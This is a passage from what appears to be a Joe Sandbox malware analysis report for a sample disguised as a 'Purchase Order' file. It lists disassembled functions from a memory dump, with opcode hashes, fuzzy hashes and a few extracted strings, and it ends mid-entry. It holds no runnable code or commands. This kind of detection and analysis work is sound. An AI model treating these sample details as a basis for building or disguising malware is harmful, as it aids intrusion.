                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: L4QwL4Qw
                                              • API String ID: 3446177414-1417497668
                                              • Opcode ID: 6ca467314824f280e3f21a8290078c11e42e8fdb4122bf2971533cc4d4062688
                                              • Instruction ID: 8a27ab42d4616ce89ef00f2e95f54f50d6a77ae385e9fcc00f11e92046b6a730
                                              • Opcode Fuzzy Hash: 6ca467314824f280e3f21a8290078c11e42e8fdb4122bf2971533cc4d4062688
                                              • Instruction Fuzzy Hash: F021D076A10714EFE3328F5C8800B0A7BB8FB88B64F118629E9659B751DB70DC02CF90
                                              Function 3484329E Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @
                                              • API String ID: 0-2766056989
                                              • Opcode ID: e2143b495f086442e09d93965647323bb736b82220bb44ad4faf64c81e07d62f
                                              • Instruction ID: b880c15f740179c07e028f8cc136044faf31bf0d44fb6a7f1d9d547c1dcb4083
                                              • Opcode Fuzzy Hash: e2143b495f086442e09d93965647323bb736b82220bb44ad4faf64c81e07d62f
                                              • Instruction Fuzzy Hash: EC317276649308DFE311CF2CD480A5BBBE8EB84794F800A2EF59493350DA34DD448B92
                                              Function 34815096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Actx
                                              • API String ID: 0-89312691
                                              • Opcode ID: 388447378a81f511bd22a0468bd8e3dcdd06e0bc43717d143b395f778b7c677b
                                              • Instruction ID: f61c04e391ca6d76b20187f7e5f3f7591b1ae70f29a2801f591bcca196182a80
                                              • Opcode Fuzzy Hash: 388447378a81f511bd22a0468bd8e3dcdd06e0bc43717d143b395f778b7c677b
                                              • Instruction Fuzzy Hash: 7011907430B7068FF7955E59C850A56B799EB823A8F31872FE460CB391EA72D881C380
                                              Function 3489106E Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LdrCreateEnclave
                                              • API String ID: 0-3262589265
                                              • Opcode ID: d0a1adb7fde7688db617a109955324e282ffda363e8573608fb327be1bf7c5cd
                                              • Instruction ID: 9ed8008c894737a619ae14b3cd4608791b6f3e59945a876e7a616195c56c8c42
                                              • Opcode Fuzzy Hash: d0a1adb7fde7688db617a109955324e282ffda363e8573608fb327be1bf7c5cd
                                              • Instruction Fuzzy Hash: F421E2B1918744AFD310DF6A8844A9BFBE8ABD5B00F404A1FB5A496250D7B1D845CF92
                                              Function 348B2000 Relevance: .8, Instructions: 757COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3322ce13006e986cf7fe01751f907dbf173302000c666da7b9314eda4679f0fc
                                              • Instruction ID: d582c0b91a56122ad0f2ec15ccbc137207cb348fc5a8c8babbf7cb8e9d5b4a16
                                              • Opcode Fuzzy Hash: 3322ce13006e986cf7fe01751f907dbf173302000c666da7b9314eda4679f0fc
                                              • Instruction Fuzzy Hash: B542DE7A6083019FEB15CF68C894A6BB7E5BF88740F444A2DF9D187360DB70E845CB92
                                              Function 348A8158 Relevance: .6, Instructions: 617COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e49d0d5f2788020d2427a29cc888a77cbd866dbef41f5459018363d6dbe0baca
                                              • Instruction ID: 794af11460504fb5f5933f665f1fcf17711e30b06992e7ac01d77e54b681b2cc
                                              • Opcode Fuzzy Hash: e49d0d5f2788020d2427a29cc888a77cbd866dbef41f5459018363d6dbe0baca
                                              • Instruction Fuzzy Hash: 6A425D75E00219CFEB24CF69C881BADB7F5BF48350F548699E848EB241EB749985CF60
                                              Function 348E21AE Relevance: .6, Instructions: 606COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7e73d9a2034fff7d30a70cb61381641c01b61b41a7d6cd4e175f93275f2a6287
                                              • Instruction ID: 883f3129fb110129a323477ff5e88d6d54499501f52203efb1c27eab409f22b4
                                              • Opcode Fuzzy Hash: 7e73d9a2034fff7d30a70cb61381641c01b61b41a7d6cd4e175f93275f2a6287
                                              • Instruction Fuzzy Hash: 26425D75E00229CFEB24CF68C940BA9B7B1FF4A314F1482AED949AB252D77499C5CF50
                                              Function 348D16CC Relevance: .6, Instructions: 571COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: defe98528a9a6d9b6d24a3bd3168fba0024913bd3f7365eb52f774f528a8d3fd
                                              • Instruction ID: 58545f0286cfff98657b29c4d8c22d0af5f6aac848f8f72fcfb2692a71c23964
                                              • Opcode Fuzzy Hash: defe98528a9a6d9b6d24a3bd3168fba0024913bd3f7365eb52f774f528a8d3fd
                                              • Instruction Fuzzy Hash: 1F22A179B01216CFDB09CF59C490AAAB7B2FF8A314F54866DD855EB344DB30E942CB90
                                              Function 3481D7E0 Relevance: .3, Instructions: 342COMMONLIBRARYCODE
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 043e1f84fc6daf3c9eee0ae612756547cf39847548f944b72e5f2fc0bae28f69
                                              • Instruction ID: 0fcb31efad3b97c5b7436fe77c240c21a92f7a26496c25e8cbe03d5c53f1017c
                                              • Opcode Fuzzy Hash: 043e1f84fc6daf3c9eee0ae612756547cf39847548f944b72e5f2fc0bae28f69
                                              • Instruction Fuzzy Hash: 03C1C275E003159FEB14DF58C850BAEBBB5EF94754F14836ED864AB280D770E941CB90
                                              Function 3482F460 Relevance: .3, Instructions: 321COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 24852d19d44088516c7f1df0be0315a73c0c755193f331f5d00d829f8103a704
                                              • Instruction ID: c932bf3b31a880e6ff7cc7f265ce63e88d5d2c52aaa953583a3535f4666c324d
                                              • Opcode Fuzzy Hash: 24852d19d44088516c7f1df0be0315a73c0c755193f331f5d00d829f8103a704
                                              • Instruction Fuzzy Hash: 77C113B6A00315CFEB04CF18C590B79B7A1FF48B54F554359EA42AB3A1EB348A81DB94
                                              Function 34820535 Relevance: .3, Instructions: 300COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a9c08bf55bab8ceb3ffe6ccb64f09498c6509cd9306e0105f84ce75b7f04b756
                                              • Instruction ID: 574aa26e65d571ed0f5f4872b7348230d6a89141e75c6693ae8d5acf74040d79
                                              • Opcode Fuzzy Hash: a9c08bf55bab8ceb3ffe6ccb64f09498c6509cd9306e0105f84ce75b7f04b756
                                              • Instruction Fuzzy Hash: D0B10575700749EFEB11CBA8C960BAEBBF6AF45310F140359D651EB281DB70E981CB90
                                              Function 348390DB Relevance: .3, Instructions: 287COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3e332721a910aae71778fd471cf093efe00915f23190599f609534f6fe554e55
                                              • Instruction ID: 09591a0d2e5325a1111e6fdc9efc34e19386f97aa4c0d9f13ebcd4e5246786cc
                                              • Opcode Fuzzy Hash: 3e332721a910aae71778fd471cf093efe00915f23190599f609534f6fe554e55
                                              • Instruction Fuzzy Hash: 65A15CB5900615EFEB12CF68CC91FAE3BB9EF45754F410298F910AB2A0D7B59C51CBA0
                                              Function 3480C427 Relevance: .3, Instructions: 280COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 36a4f10ee20004dd0af4ab6f13a67ebb153a6d421abe331a249c15f671bd4c11
                                              • Instruction ID: 7ece7e0f9d22aa6fb3eb7e0830a80d06f0e30f37f9bfccaafc1178595c00690d
                                              • Opcode Fuzzy Hash: 36a4f10ee20004dd0af4ab6f13a67ebb153a6d421abe331a249c15f671bd4c11
                                              • Instruction Fuzzy Hash: 7FB16D74B102599FEB68CF58CC90BA9B3B5EF44744F4086E9D50AA7250EB74DD85CF20
                                              Function 34850185 Relevance: .3, Instructions: 276COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: aa09cb3ba0bd58685f420196a3ef97af741ffb6edb1c9794ff16cb34a2cd5a63
                                              • Instruction ID: b7a12dffab49a81195247c115c840fd4be2419dd6fae2acf77dc6569822bd7ae
                                              • Opcode Fuzzy Hash: aa09cb3ba0bd58685f420196a3ef97af741ffb6edb1c9794ff16cb34a2cd5a63
                                              • Instruction Fuzzy Hash: 28A10674B0171ADFEB14CF69C990BAAB7B5FF45358F004269EA15D72A1DB74E802CB80
                                              Function 348960E0 Relevance: .3, Instructions: 264COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3af5b009f404a690d4a7b23759b96833702cf79b04498c8dda0a19ff0bfe3de6
                                              • Instruction ID: 77dd5ce8189c385012d315fa8be1cd6c1265aff71201c02b03b5986ad60c75ea
                                              • Opcode Fuzzy Hash: 3af5b009f404a690d4a7b23759b96833702cf79b04498c8dda0a19ff0bfe3de6
                                              • Instruction Fuzzy Hash: D7919FB5E00619EFEB15CFA8D880BAEBBF5EF48750F114269E510BB360D774D9019BA0
                                              Function 348BB550 Relevance: .3, Instructions: 263COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ac246e365be52c827deb6f138a6d6fdea14e4f5b4d99e6f0a6564c7e226997bc
                                              • Instruction ID: 528bba939e609fb061bf06b5f8dc786aeaf124a4c7591f311c6cf7992bcb6b88
                                              • Opcode Fuzzy Hash: ac246e365be52c827deb6f138a6d6fdea14e4f5b4d99e6f0a6564c7e226997bc
                                              • Instruction Fuzzy Hash: B7A12879A00605DFDB24CF1DC580A1AF7F6FF89350B24866ED59A8BB61E770E941CB80
                                              Function 34819486 Relevance: .3, Instructions: 259COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e34cb9e77f72b13ae9a0a44f853be194f680377085ddbcd842d4232687975ff0
                                              • Instruction ID: 3a79037feafbdae7b8611ab5d855ed75409f13f9e5b4503967b31c8ddd9314f9
                                              • Opcode Fuzzy Hash: e34cb9e77f72b13ae9a0a44f853be194f680377085ddbcd842d4232687975ff0
                                              • Instruction Fuzzy Hash: 4EB118B8A04305CFEB14CF19C480A99BBA4FF48394F50469ED927AB291DB75D883CF90
                                              Function 348CB52F Relevance: .2, Instructions: 222COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
                                              • Instruction ID: 6ea0d218d957c2f3c963c96bf5f3b0b2846e23d5bdcd4e83c08760f3cd3d8d49
                                              • Opcode Fuzzy Hash: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
                                              • Instruction Fuzzy Hash: 4771B079A80A1A9FDB10CF6CE480ABEF7F9AF04790F55421AEC10AB240E735DD41CB90
                                              Function 3483D090 Relevance: .2, Instructions: 217COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                              • Instruction ID: 21acea8449a037bb8c437b32f6cbeedefb2cba36baf041e0236da3bb61a87e7b
                                              • Opcode Fuzzy Hash: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                              • Instruction Fuzzy Hash: 37817E7AE01219CFEF14CF68C8907ADBBB2FF84344F55866ED815B7244EA7199408B91
                                              Function 3484E284 Relevance: .2, Instructions: 212COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b948f20e9b5c10bb90835153be35ab6cc6c5ec37b60908aec20c3944780267f7
                                              • Instruction ID: 7867c293930fb461fe23775f03bc019b901303eaa8574036c7cd345a55a3415f
                                              • Opcode Fuzzy Hash: b948f20e9b5c10bb90835153be35ab6cc6c5ec37b60908aec20c3944780267f7
                                              • Instruction Fuzzy Hash: 05811B75A0060DEFEB15CFA9C880AEAB7B9FF48354F104629E559A7250DB70AC45CB60
                                              Function 3482C640 Relevance: .2, Instructions: 206COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7fa3c7cde40301328f046217026ba0c06afd44ad6388cf48f6a541bee8647ad7
                                              • Instruction ID: 7e76272c359be4971188421467b1884ee2c1bad82ef638b11e10a21a13871522
                                              • Opcode Fuzzy Hash: 7fa3c7cde40301328f046217026ba0c06afd44ad6388cf48f6a541bee8647ad7
                                              • Instruction Fuzzy Hash: AF71BCB9D05229DFEB218F59C8907AEBFB4FF49740F10861AE851AB350E7319881CB90
                                              Function 3482260B Relevance: .2, Instructions: 201COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 394fb55067f0bf5f21b46111ae08119657c59e399a8888b374e9504844a4cafc
                                              • Instruction ID: 7a5d8da43f5656de277011f1b203c67b8d16f739a0cf63d3a2ddc797b2a53c19
                                              • Opcode Fuzzy Hash: 394fb55067f0bf5f21b46111ae08119657c59e399a8888b374e9504844a4cafc
                                              • Instruction Fuzzy Hash: 7471C176704645DFE301CF28C490B66B7E5FF88314F0486AAE898CB365DB74D986CB91
                                              Function 348B375F Relevance: .2, Instructions: 201COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4f1a6c722797ebc0e813cbc265782e1ceec23f6f40ee7a9646b94a5390509761
                                              • Instruction ID: 51bc4fa41e2ab68b63b81b9e28cee8c82658a4eb727cc29fed86dad2831df8ac
                                              • Opcode Fuzzy Hash: 4f1a6c722797ebc0e813cbc265782e1ceec23f6f40ee7a9646b94a5390509761
                                              • Instruction Fuzzy Hash: 7C718F75A00228EFDF16DF98C880AADB7B5FF49750F504219E891AB361D7B1EC51CBA0
                                              Function 348A62A0 Relevance: .2, Instructions: 198COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: eb95ce0d77cc5e37761f472ed869880a1eaad68a20eca5a3ae632f64b5d2e727
                                              • Instruction ID: 0628c76ed96e16ec791b1c9887ec417c18e4d85f0ec9f714beaa31e6f394da3b
